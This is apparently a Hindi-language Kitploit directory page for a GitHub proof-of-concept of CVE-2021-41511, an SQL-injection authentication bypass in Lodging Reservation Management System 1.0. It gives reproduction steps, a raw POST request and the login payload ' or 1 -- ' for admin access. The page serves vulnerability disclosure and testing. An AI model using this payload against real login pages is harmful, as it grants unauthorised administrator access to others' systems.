Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41511 — SQL इंजेक्शन और प्रमाणीकरण बाईपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Lodging Reservation Management System 1.0 में, क्राफ्टेड पेलोड के माध्यम से अनधिकृत एडमिन एक्सेस सक्षम करना। | Kitploit
उपकरण/GitHubGitHub/vidvansh/cve-2021-41511
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

SQL इंजेक्शन और प्रमाणीकरण बाईपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Lodging Reservation Management System 1.0 में, क्राफ्टेड पेलोड के माध्यम से अनधिकृत एडमिन एक्सेस सक्षम करना।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41511

शोषण शीर्षक: Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass

शोषण लेखक: Nitin Sharma(vidvansh)

विक्रेता होमपेज: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

सॉफ्टवेयर लिंक: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

संस्करण: v1.0

परीक्षण किया गया: Windows 10 - XAMPP Server

विवरण : पासवर्ड इनपुट अनुचित स्वच्छता के कारण प्रमाणीकरण बाईपास से प्रभावित होता है, जिससे अनधिकृत खातों तक पहुंच होती है।

#पुनरुत्पादन के चरण: चरण 1 उत्पाद व्यवस्थापक पैनल http://localhost/lodge/admin/login.php पर जाएं। चरण 2 – उपयोगकर्ता नाम और पासवर्ड में कुछ भी दर्ज करें चरण 3 – लॉगिन पर क्लिक करें और बर्प सूट में अनुरोध कैप्चर करें चरण 4 – उपयोगकर्ता नाम को ' OR 1 -- - और पासवर्ड को ' OR 1 -- - में बदलें। चरण 5 – फॉरवर्ड पर क्लिक करें और अब आप व्यवस्थापक के रूप में लॉग इन हो जाएंगे।

PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

प्रमाणीकरण बाईपास:

व्यवस्थापक लॉगिन पृष्ठ (http://localhost/lodge/admin/login.php) पर जाएं, फिर नीचे दिए गए पेलोड का उपयोग उपयोगकर्ता नाम और पासवर्ड के रूप में करें =>

उपयोगकर्ता नाम: ' or 1 -- - पासवर्ड: ' or 1 -- -

टूल डाउनलोड करें